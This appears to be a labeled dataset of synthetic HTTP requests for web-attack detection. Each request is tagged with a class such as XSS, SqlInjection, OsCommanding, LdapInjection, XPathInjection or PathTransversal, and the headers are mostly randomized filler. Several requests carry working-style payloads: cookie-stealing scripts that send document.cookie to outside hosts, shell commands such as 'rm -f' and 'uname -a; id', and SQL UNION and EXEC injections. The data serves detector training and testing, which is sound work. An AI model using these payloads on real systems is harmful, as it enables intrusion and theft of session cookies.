Host: 180.103.109.153:9
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-chinesesimp, x-mac-korean, iso-8859-7;q=0.4, cp-932
Accept-Encoding: identity;q=0.8, compress, gzip, identity, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 196.184.80.212
Cookie: horbrhiz2g91=8ntn7ieealsniVAf;swbt6nz=bgbfiseterev:;34awofeR=ll;reost=8@lHTV-xTp8p;g9rNsjnetqW7u=as;RsystemmqWj6=s)
Cookie2: $Version="6"
Date: Mon, 21 Nov 05 03:09:32 UTC
ETag: "NH0nqaIAQJf.Juk35"
Expect: 100-continue
From: lrS1n@ltwen24wwu.net
If-Modified-Since: Thu, 22 May 08 11:52:37 GMT
If-Unmodified-Since: Sun, 28 Sep 08 24:21:42 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 30 Aug 04 08:28:18 GMT
Max-Forwards: 29
MIME-Version: 0.0
Pragma: estre=tolryoa
Proxy-Authorization: NTLM N3RGc3RpbGRnanRleWRzUGthc3MwcmVldGlESmo4ck4=
Authorization: Basic ZW90c1M6Y3BpZXI=
Range: -7403,569103-
Referer: http://www.Wnus.fr/iiEej/iooaneae/eeeD/tnyid.cfm
TE: gzip;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.1 (compatible; Aelpuf; Win98; stNaet9e; raeVnZn; tp1aNt)
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 757x2155
Via: HTTP/4.2 100.28.171.184, FTP/9.2 www.ruhntn5e.jpg, HTTP/1.6 6.19.55.50
Transfer-Encoding: baag
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 718 12.78.142.38 "hTEovTag" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39379
Start - Id: 43546
class: OsCommanding
GET /LnetcatzCt.php4?9bsijmtrd1e8xu=%5Cnls++++%2Froot%2F&tal=%27h%3Bhlnrc%5Bml0doauo HTTP/1.0
Host: www.ecrhdDqti.fr
Connection: close
Accept: text/xml
Accept-Charset: x-mac-greek, iso-8859-15;q=0.9, cp-950
Accept-Encoding: 
Accept-Language: t3-ilfARi;q=0.8, jqy-8ed5hem, t39mN4tt-innlec, Sishreis-dhedo, Itcho-xrl2
Cache-Control: max-age=734
Client-ip: 214.70.1.175
Cookie: mtcaktjtsoRnl=ofrom;V@4PxVQ63=aJ_@OzJWwv3d;dd=55
Cookie2: $Version="17"
Date: Fri, 05 Sep 08 15:22:47 CET
ETag: W/"LAnz5Rj1v.GFfze"
Expect: 100-continue
From: nsaoonaw@rhao6t.cz
If-Modified-Since: Mon, 07 Jun 04 14:42:52 UTC
If-Unmodified-Since: Wed, 04 Apr 07 07:55:26 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 34
MIME-Version: 4.3
Pragma: SRbdEojh='dtoobay'
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: Digest algorithm=dceste
Range: 1-
Referer: /hStpxit1/aaboa.mpg
TE: trailers
Trailer: Expect
User-Agent: is3mtusysi/2.0.3.7
UA-CPU: x86
UA-Disp: 484,9177,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 559x227
Via: HTTP/2.3 www.tUwoq.tiff, ack/0.3 www.aacl.tiff
Transfer-Encoding: compress
Upgrade: Bo4/0.1, iai/6.5
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 166.207.32.118
X-Serial-Number: 431097380
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43546
Start - Id: 47259
class: XSS
GET /hhAli/2tciitsghre/0ITa7bRt/ooleh9/LVhPrYDd/i.bPA/1S@TPjx.DJ1nHCBC7S/lSK0UmCyI9Ni.8cYh/t16MNDZYvV/aQu7.e30rR/hhSawrh/Qx68oJ.7uL.dll?wst4haakSm7os=orcwo+&e4Sap=97312&pscriptt4libu=uOcopyawindow.openZi&pNysuostEtra=shutdownb&tqeuzs=%3Ciframe++++src+++%3D+%22vbscript%3A%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.atis.com%2Fcgi-bin%2Folre.cgi%27%2Bdocument.cookie%29%3B%5D++%22++++%3E&Jftpl_EjFwi=2rNe&d9aats7aaFre=8oxt.MQ&twqrTrsiO=pJ4qbemC.&srnlraits94xogf=4912983905&DpnfP=kx&arnmaIly=rlse HTTP/1.1
Host: www.gdzcbshN.it
Connection: uislt
Accept: text/plain, text/xml;q=0.0, text/*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: wjYeer-ed1ro;q=0.9, io-w2oolaer;q=0.9
Cache-Control: min-fresh=71
Client-ip: 10.37.184.28
Cookie: Sidn0odethlk8o=nXNl8Gk;hhcamsolkfxx=rxrjdsnS;5i3ealHl=unneee;toraee6s6idf=4671529;xdip=jxSqc
Cookie2: $Version="945"
Date: Sat, 25 Oct 08 01:00:34 GMT
ETag: "O7yNIlPXTK89F@56Rc"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Sun, 20 Mar 05 23:04:56 GMT
If-Match: "NEQ1xIigljmLlzlZuTHm"
If-None-Match: "qAvsBsEgX6ppumTUl"
If-Range: Thu, 04 Mar 10 12:02:16 UTC
Max-Forwards: 5303
MIME-Version: 3.6
Pragma: yar=encervSm
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Basic ZXRhcjp0ZXppb3Nl
Range: -1,528-520677
Referer: /stora/afjhe0li/AhoXt/o30q.wav
TE: chunked;q=0.2,trailers,chunked
Trailer: Warning
User-Agent: gRmqudnaw5hba9c
UA-CPU: StrongARM
UA-Disp: 571,3575,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 077x3740
Via: 4.9 56.143.93.248:15
Transfer-Encoding: compress
Upgrade: hth/1.0
Warning: 109 34.121.129.24 "7lqe" "Mon, 29 Oct 07 23:17:08 CET"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47259
Start - Id: 43364
class: OsCommanding
GET /ind4o3uyireb/Gneutnh/JBwgethg/alw/tkj9oAUS35cB_HAZ/s0_AQi/ni/4AA%u/ZXh8JcbW/ilngestt1e3gai/Qsock_streamcInetcatmrNaX/enisenoiu.tiff?2e6tax=scutiroeiulc&nlemIealtrtosa=443831704&aonnrotl=heet2cfnukn&ubcUsb45mm=0&wQh=itnzu5&uu0kiaheboo=srlaxat2eelrtat1r3&JLj3RoS=rtnascript&0nTNa5cCB=r%3D&natcOreCmdes=%2Fstihttp%25oa%25ujhclibsd4&nasa=rm++-f+%2Ftmp%2Fketrne+%7C&hsoueo8=aeae&oiesytef=ln%3Dtt%7E HTTP/1.1
Host: 250.103.127.77
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-2022-kr, windows-1250, x-mac-arabic
Accept-Encoding: gzip;q=0.0
Accept-Language: *
Cache-Control: max-stale=630
Client-ip: 149.20.39.78
Cookie: enka5yet0d=c6inxoajed<j-a;ATdeneoleti7azE=3s;RneyexHnIs= eh
Cookie2: $Version="744"
Date: Mon, 26 Jan 04 20:51:10 UTC
ETag: W/"MfQ3kG-@pCjXqY2jW"
Expect: 100-continue
From: vpsly@coiheDy.uk
If-Modified-Since: Thu, 30 Apr 09 12:48:43 UTC
If-Unmodified-Since: Wed, 07 Feb 07 11:22:56 CET
If-Match: *
If-None-Match: "p2@jPP62BlQdFRMkN2"
If-Range: *
Max-Forwards: 875
MIME-Version: 3.7
Pragma: q=hoq
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: NTLM bmVldTdpU0NtZVVuRW10bzAxdnl1eVRld3RJd2hlMHVpbGFjdTNzb29xYXk=
Range: 9-
Referer: /Go6unj/rd2v/tmErs.bin
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.2 (X11; U; Open BSD i586 3.2; cS-rr; rv:1.3.0) Gecko/20492808
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 552x8251
Via: Mdbet/5.1 www.etmu0215.shtml, ntqa/8.9 www.nfhbmaL.png, 7.3 www.anty.css
Transfer-Encoding: identity
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 363 www.igd5n.css "nqcasc4" "Sun, 08 Jun 08 05:03:15 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 12428062280224524
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43364
Start - Id: 48637
class: XPathInjection
PUT /ilhiehhroitEdecoh/FDkB-having8IGXD1/uplfTW1-UKLUDsjG@afb/ifwgmanxre3/eslnrhArya/ieeeK6snftrgjsen/bB/1ITk/r-bj/exzLJr@IJ-_sEEU.png? HTTP/1.1
Content-Length: 318
Content-Language: coleiae
Content-Encoding: deflate
Content-Location: http://nzeo.org/phtvdA/8autmi/6auitr.php
Content-MD5: YWNpZXJtb3VkYlBscjlidw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Mar 09 07:58:57 GMT
Last-Modified: Mon, 21 Jul 08 15:39:47 GMT
Host: www.fiEipdt.net
Connection: aAhouemr
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: s-njohe, h6w-si, fwuha21a-w;q=0.4, 7n6t-e9t3vst;q=0.3, toreeb-hT;q=0.5
Cache-Control: no-transform
Client-ip: 145.67.254.44
Cookie: Eb0Y=ratDrosi;o5=553;o3ze5eAtHiue=1aamocha7<ea1iej;96XsbwQ=lsiig;tOasn=ht;aThatu=ti
Cookie2: $Version="469"
Date: Fri, 16 May 08 21:52:49 GMT
ETag: W/"EZ85ec1UkDY_9WvB"
Expect: nIa1=ttl7lssu;IeiaDaia
From: Ninoyjig@whephoIrat.uk
If-Modified-Since: Tue, 14 Jun 05 15:59:49 GMT
If-Unmodified-Since: Tue, 18 Mar 08 03:55:22 GMT
If-Match: "glo3tISo0wY7XwiL"
If-None-Match: *
If-Range: Tue, 18 Jul 06 06:34:57 GMT
Max-Forwards: 838
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM bG4wYVRycm10cnd0c21lM2dzOHNhbmVpb2F0bXNjbXVy
Range: -046912,8351-4,007308-22
Referer: /trrhyNee/suomoil.mpg
TE: gzip;q=0.7,trailers,trailers
Trailer: Range
User-Agent: Mozilla/2.6 (Machintosh; U; PPC 8.1; el-hs; rv:3.7.1) Gecko/24049227
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: 9.3 165.2.191.108
Transfer-Encoding: gzip
Upgrade: ohth/5.2
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 498858561497
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hEizTac4my=rd/aEea/rhmin/child::node()[    position()=5]   |    aBohT/hId/siOojr/child::text()[position()=288]    or    'obnsih'  =    '&bn=lGVlUZ&ot2o=Adf9xkuurmevaltu&onbns1aur4=e6az &ulhnhatene8ulDs=eouaaedgdEa&13ypa=nd&ewrmrmrevn0ter=aAyino46nuy&erstir=255

End - Id: 48637
Start - Id: 42511
class: SqlInjection
GET /gdL/edcWVSPx/rTZ1qgA/e1IR8F/tyeesdwlhw/rnTcbswanpii1gfeet/eote4tn/irR.mi9Q4-/1guhNO6m8Zt9y/rpd8w8aodfuekijaRix/ouYUOEew0nyE0HxTEBVE/2aDhDeW.vYj.asp?tSay1tei=%40m+Jectsdhhdivonh+sels&nwtmhi=eornTlnM&rmjaieolena5=%3B+EXEC%28++++%27UNI%27%2B%27ON%27%2B%27+++++%27%2B%27SEL%27%2B%27ECT++++++%27qrc%27%2C1698%2C013677%2C%27iuSetnrh%27%2C9+++FROM+ff%29&CDK-QCj4ID9=zvhN HTTP/1.1
Host: 140.2.224.37
Connection: fcfrteuv
Accept: text/plain, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=2
Client-ip: 17.1.105.246
Cookie: 5teh=essz;uRdy4tc=wncehtneiijr;jaan6pccDtaegi=8158875755
Cookie2: $Version="9"
Date: Mon, 15 Mar 04 07:31:47 CET
ETag: "Fhdp4@cKxDHrUkZvfQ"
Expect: 100-continue
From: be38Ged@6e9snto.ch
If-Modified-Since: Mon, 15 Dec 08 04:40:03 UTC
If-Unmodified-Since: Sun, 02 Sep 07 04:25:35 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 24 Feb 04 01:49:49 UTC
Max-Forwards: 509
MIME-Version: 6.8
Pragma: doiibNn='irtsd'
Proxy-Authorization: Basic d2xpbjplbmsxaHk2bQ==
Authorization: Digest nonce
Range: 3841-,03878-1656,7-7
Referer: http://www.e9acljho.cz/Nsr1/8gdnt9i/hanfialr.jpeg
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.8 (Windows; U; WinNT 2.1; hU-cb; rv:5.3.7) Gecko/22399728
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 5.6 65.222.130.51, 4.1 www.Rbsg.png
Transfer-Encoding: deflate
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 860 252.84.118.119 "gymdt4aeaea4ehhX" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42511
Start - Id: 37298
class: LdapInjection
POST /OFkjy6bcC4Txupdate/y3mSf7KIpz/tnmtsvetXeet3pS9ifw/fgZyGO_6rdQxqk-3Cib/nu6itirniwqalZr/opocjocs/mIiwYRtwJntKF-Qg/VbLKORvbscript8CH/eneungtnl1nTN/Upcr9r/JLWiKb-7QXG/tdti7c6Ate5m9hmneocH.htm? HTTP/1.0
Content-Length: 113
Content-Language: qaSuere,RfWhso,eh5ihrbr
Content-Encoding: gzip
Content-Location: http://eioeu.st/zumtdld/iesli/soi4p/eesm/eesnu4.sh
Content-MD5: a1J0bXFvaGFyZWVVNHRmcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Aug 08 14:29:58 GMT
Last-Modified: Sat, 28 Jul 07 05:15:38 GMT
Host: www.oEs9ng.biz:80
Connection: keep-alive
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: amI-co, 4-ycw, sqO-o4i;q=0.9, rohea-eitWfi, emY-4Sai
Client-ip: 139.199.141.23
Cookie: sGdlx=6;meep=034196;ilw49ar5zBperl8=sne)(&(objectClass   =sdh*);om2eee1faniRttn=4jii;ePx6iwsn=6941;9g6R=eyeE cbgsoundN%div  ce1hrnxs
Date: Wed, 13 May 09 03:57:31 GMT
Expect: 100-continue
From: sert@enrq0eiie.de
If-Modified-Since: Sat, 15 Aug 09 22:42:08 GMT
Max-Forwards: 0578
Pragma: ceh=riXisx
Range: 127403-3592
Referer: /HApre/sMmt/tnmdeaw.bin
User-Agent: iaFa6L/0.6.1

s1nzialul=eiies pnhi&7ooaredvoip=3188367&M277QTfewhere=95AVliLjvngH&te=747560630&rYibpteanao=554&sTi0hGm9tetz2=tv

End - Id: 37298
Start - Id: 43363
class: OsCommanding
GET /rrem5kFernlsh8Eu/winntl30wSur/spozNdolae/kjls1/ua6jzTmnenth/l9JdWq2rYRw/ckAF_@-vb/y06tsl2DiBcJJ3fUoxnJ/eMblNtKZn4.BaNZcE1A/ic4KGNt1/2oobo8Ce/iMQQcznT-Ls0a9.swf?lonsetnrbwsn=6hoslina0rltgmt&Nuw_15wf=pJ9Kw&s1trnnda=79259&sat9mnuLtrs=65861&pxkoiTneita=++++%3Becho+%3B++++w+++++%3B++++uname+++++-a%3B+++id&tsfo8gfeoezd=196&ec=coNVGRMLL&Tn=cidmt&igsacls=43242&ge9=1272280&hkht=8860021&Ew3h=799806722&HkWIheg0wN=%3D&noanswsj=59b%40lgf&bbeitrt=mails HTTP/1.0
Host: 58.178.67.204
Connection: ltol9tth
Accept: */*
Accept-Charset: euc-jp;q=0.6, us-ascii, x-mac-icelandic;q=0.7, us-ascii;q=0.5, utf-8
Accept-Encoding: gzip;q=0.0
Accept-Language: ldhtt-m, n-d;q=0.7
Cache-Control: max-stale
Client-ip: 149.20.39.78
Cookie: enka5yet0d=c6inxoajed<j-a;ATdeneoleti7azE=3s;RneyexHnIs= eh
Cookie2: $Version="744"
Date: Wed, 09 Apr 08 11:46:05 UTC
ETag: W/"MfQ3kG-@pCjXqY2jW"
Expect: 100-continue
From: vpsly@coiheDy.uk
If-Modified-Since: Thu, 30 Apr 09 12:48:43 UTC
If-Unmodified-Since: Wed, 07 Feb 07 11:22:56 CET
If-Match: *
If-None-Match: "p2@jPP62BlQdFRMkN2"
If-Range: *
Max-Forwards: 57
MIME-Version: 3.7
Pragma: q=hoq
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: NTLM bmVldTdpU0NtZVVuRW10bzAxdnl1eVRld3RJd2hlMHVpbGFjdTNzb29xYXk=
Range: 9-
Referer: /owewgo8d/tGynm/nolnh4o/ueaLaT3h.php4
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/3.5 (Windows; U; Win98 8.2; me-a2; rv:0.7.0) Gecko/24960067
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 552x8251
Via: Mdbet/5.1 www.etmu0215.shtml, ntqa/8.9 www.nfhbmaL.png, 7.3 www.anty.css
Transfer-Encoding: identity
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 363 www.igd5n.css "nqcasc4" "Sun, 08 Jun 08 05:03:15 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 12428062280224524
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43363
Start - Id: 47809
class: XSS
GET /icg/eWjX3BsonV7TJX-4DMLW.asp?itdbreendooooo=+lOea&4smseh=tnm9PzlsThnit&6trieeabwti=iokvQObEK&L3netcatNR0=%5DmAoef&E3n1rni=his%29%26&_cqVKQQb8TZG=8023&satDrT2he=enbgsoundim+79eeA&w23i=ptcty&8catqsttmi=dadpi0&io=Guy&r9huehx6nnd=unedm4e&HBFY@7adminX48=66&ehhtditwfntai=%3Cdiv+++++style%3D++%22binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.ndnstoll.com%2Fscript%2FoP1ifoixde.php4%5D%29%3B+++%22++++%3E&ys=qefo HTTP/1.1
Host: www.wsto1ottt.net
Connection: umxat
Accept: */*
Accept-Charset: shift_jis;q=0.1, windows-1258;q=0.4, euc-tw, windows-1251;q=0.9
Accept-Encoding: 
Accept-Language: Ps-rqg;q=0.9
Cache-Control: only-if-cached
Client-ip: 203.27.77.55
Cookie: reJ1nuepm=87388;MQ6RE1f=oig;05Z765.oFAhavingE=anETnpNscdH;XGY7Xv-httpunionF= htpass5c]ls-8tqeohr;ro1b8Wktmbqf=wo
Cookie2: $Version="5"
Date: Sun, 11 Jan 09 10:15:38 GMT
ETag: "cb8w5hhmsZL2xLnl0P0C"
Expect: 100-continue
From: shnba@roottg.it
If-Modified-Since: Fri, 22 May 09 04:27:52 GMT
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: *
If-None-Match: "blxckQPBRZolTKehi"
If-Range: Sat, 25 Feb 06 21:59:41 GMT
Max-Forwards: 637
MIME-Version: 8.3
Pragma: etey='doq'
Proxy-Authorization: Digest username="oaid"
Authorization: Digest opaque="e8ts9it"
Range: 2820-37,-5180,81-
Referer: /etEXotl/mnelnta/Eodear/hEzA.nsf
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: ystTnngileevidjt
UA-CPU: x86
UA-Disp: 191,879,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9392x482
Via: HTTP/0.5 7.11.105.199, 3.3 247.22.173.87
Transfer-Encoding: gzip
Upgrade: sdmaat/7.9
Warning: 315 223.24.177.34 "gnbpnesajImnUauppEa" "Thu, 03 Jun 04 13:41:49 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 637705513942579260
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47809
Start - Id: 45316
class: PathTransversal
GET /Ittg5hsHoVvfyaatte/6jlinkdmpRo_1/hahzVa.jsp? HTTP/1.0
Host: www.sgqyiob1.net
Connection: eIjmeedw
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: 9E-Ca0frn, zaiobnx-r8eamcn;q=0.6, ytoeds-tnitde;q=0.1
Cache-Control: max-stale
Client-ip: 0.245.242.111
Cookie: are5ulhctji=desS5hn6;ooalhlisqaeatMs=hm4u s=n8ii;Lahhhq=e:\winnt\boot.ini
Cookie2: $Version="0"
Date: Thu, 12 Jul 07 22:24:40 GMT
ETag: "tfaeljRKmP40lVN12Bwm"
Expect: 100-continue
If-Modified-Since: Mon, 01 Nov 04 01:26:53 UTC
If-Unmodified-Since: Thu, 02 Apr 09 09:03:57 CET
If-Match: "kSx1yY-5K1z7v7aLb2"
If-None-Match: *
If-Range: "sGqva@JMfanmMh6bX4dU"
Max-Forwards: 8593
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic dW5ycFRjMm06d21ubmE=
Authorization: unwol eoeor=occeafsa
Range: -728463,891808-
Referer: http://al3uT.fr/hIhrk/oahgAii/rehtdo.txt
TE: chunked;q=0.3,gzip;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.6 (Windows; U; Win 9x 1.1; co-ln; rv:0.8.0) Gecko/66742089
UA-CPU: x86
UA-Disp: 977,0982,16
UA-OS: WinNT
UA-Color: color8
Via: 2.8 www.sksm.png:0873, 3.3 142.9.111.216:8, FTP/2.8 www.od6ah.jpeg:781
Transfer-Encoding: deflate
Warning: 862 138.235.187.151 "taonetlreetepa7" "Fri, 19 Nov 04 03:03:30 CET"
X-Forwarded-For: 74.25.201.88
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45316
Start - Id: 47145
class: XSS
GET /wKIX44AZr.dll?gsgErIHni6f=%3Cxml+++src+%3D%22javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F64.38.29.150%2Ftiveor.bin%27%2Bdocument.cookie%29%3B%5D%22%3E HTTP/1.0
Host: 191.178.0.213
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: arb-e, onior-tTe;q=0.8
Cache-Control: no-store
Client-ip: 13.138.53.141
Cookie: eysas2jtuxsooY2=vt3zijylf;rr=EeSimytfoe )dh(z@;n5oees8h=4066565169;Z6oirlF@Ggroup by8J=an:
Cookie2: $Version="5"
Date: Wed, 23 Mar 05 16:46:03 CET
ETag: W/"h8GIdQBR_P5h.4Cev5X"
Expect: tnrpsa=tPsspxH
From: xeliaGtt@ccieug.de
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Mon, 27 Apr 09 04:33:52 GMT
If-Match: *
If-None-Match: "Bk@IKxqGEnEQMGu.e"
If-Range: "jJzAUVFXaY6WV9J_Gu"
Max-Forwards: 2
MIME-Version: 6.6
Pragma: oex=8imwuea
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: NTLM dGlFdG9kcGY5aHN1b2FtbGFpcmU3cmhwaXRuM0lhZWNpZXJlYWVkaA==
Range: 9848-585788,73810-,9-
Referer: http://www.cvo4oAs0.fr/reorei/e9ae/w01ct2e.mdb
TE: trailers
Trailer: Cache-Control
User-Agent: lt0hs (hc_RNH8oKZ; f4GALSY)
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: FTP/9.8 www.yyniHem.shtml, 1.9 49.41.27.228, 8.8 151.56.170.120:729
Transfer-Encoding: deflate
Upgrade: oslis0/7.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 77.180.133.237
X-Serial-Number: 54001451967
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47145
Start - Id: 35420
class: SqlInjection
GET /childbj0GWuyM8vM6/yneiafinbntndzplCnh/o2@tyVU.eqQb3AcgTvv.swf?etf=0ss%27+apo&aMea2dnoySnyo1e=965&fselsbektl3=%27+%29+UNION+++++ALL++++SELECT++++443%2C116%2C51%2C4288%2C5379++FROM++fis+++++WHERE+++%28++%27%27++%3D++++%27&homeRQaccess_logEGcat6MCrL=tpabres HTTP/1.1
Host: 215.33.2.95:5318
Connection: cu6a1
Accept: image/*;q=0.9, text/*, text/*
Accept-Charset: iso-8859-15, iso-8859-15, x-mac-chinesetrad;q=0.7, iso-8859-2, x-mac-greek;q=0.9
Accept-Encoding: compress;q=0.1, compress, compress;q=0.7
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Cookie: eleenitbg=ue
Date: Wed, 29 Apr 09 19:06:48 GMT
ETag: "xs@3tPvr8T.jKwZ7M6C"
Expect: otshn=eit7Ef;piex=d6oeea
If-Modified-Since: Sat, 24 Sep 05 21:12:23 GMT
If-Match: "xfqE_05OTk93KO.Yl"
If-None-Match: "-M-mg2EWbeB@TUE7br@2"
If-Range: "r@1bfIIiOX1_k1qKLf"
Max-Forwards: 7395
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: mnACee jh2try=tf8qepe7
Referer: http://ctef.net/lhteyc/menee/emodlpih.php
Trailer: TE
User-Agent: Mozilla/5.6 (compatible; MSIE 7.6; Win 9x; iion; aeaahe6; hircmsoh)
UA-OS: Linux
UA-Pixels: 4111x1385
Via: 2.5 www.r7cejt.shtml, FTP/8.1 www.eSfjt.jpeg:29, ZT0e/7.6 www.nieae.css
Transfer-Encoding: hkHet; gnohn=gakvc7cs
X-Serial-Number: 323144017545
----: ----------

null

End - Id: 35420
Start - Id: 46595
class: XSS
GET /sXD3ihLW3/swHOuGu.GBfkC/oc0eaeerthReeespI.php3? HTTP/1.0
Host: www.rnm69snan.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic, koi8;q=0.9, iso-2022-kr, iso-8859-1, euc-cn;q=0.8
Accept-Encoding: 
Accept-Language: ThsMirn-tr2gnse;q=0.1, V1ktnvV-siisef
Cache-Control: no-store
Client-ip: 83.13.216.219
Cookie: Aa0hr= t2;gCfromG=so2n6plesth;td=evz;loc4bmndivce=gilhhuKtpann7otsft;hru2paSdnhrnleu=hto7IsfO9Iy
Cookie2: $Version="0"
Date: Sat, 03 Jan 09 18:29:16 GMT
ETag: W/"8Su7pNQCkfhfoAvcE"
Expect: 100-continue
From: eoshsh@qisp7eg.org
If-Modified-Since: Thu, 16 Aug 07 03:23:39 GMT
If-Unmodified-Since: Tue, 03 Nov 09 20:23:31 CET
If-Match: "c4qO6kQE52ErXuKX"
If-None-Match: *
If-Range: Fri, 06 May 05 03:43:51 CET
Max-Forwards: 2
MIME-Version: 1.9
Pragma: ica=oeicS4
Proxy-Authorization: so7n seEgteed=c5edme
Authorization: dieu tqdai4e=aRe2moj
Range: -2,441595-
Referer: http://sdtesea.de/n6loide/ebmlo/idhe/cymx/wea5.dll
TE: chunked;q=0.2,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: &{[window.open('http://146.233.254.51/seli.sh'+document.cookie);]};
UA-CPU: Sparc
UA-Disp: 1938,517,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 7.6 166.187.3.255, 2.0 83.95.171.243, h3E/3.5 201.201.141.93:2082
Transfer-Encoding: deflate
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 814 www.hsOonn.js "iker" "Fri, 28 Jul 06 12:52:58 CET"
X-Forwarded-For: 146.70.16.14
X-Serial-Number: 015353495234
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46595
Start - Id: 41037
class: SqlInjection
GET /fvWeto/dosMgacaorhsse/gn8mgE/iatefmeeza/1QAJik0kB21jE/iOTjtth36/r.2MysP3jqWg/to3gtttdissisioe/nxwy6E@m_Vttm4/au3JYB36ZmE_kEhYA/pPBKn/ixDE55ZD6mxhgR8iUQ.asmx?icdoi=spnn%24&0.N6JEZVf=7524044869&gbeeeqy=j5uubopxoezRtims&Ox1esea=28542&i4=bulk+++++insert++sohe+++++from+++++%27pwdump.exe%27++with++%28codepage%3D%27RAW%27++%29&oi1nbe=lV7i6Nd&s4p6=h&2PN4teniznamC=estsn%5Dd&nn9tsttts=l&rSNpE26hbEafiie=oJOa.ofT HTTP/1.0
Host: www.AhnsgpEBae.st
Connection: 0upi
Accept: */*
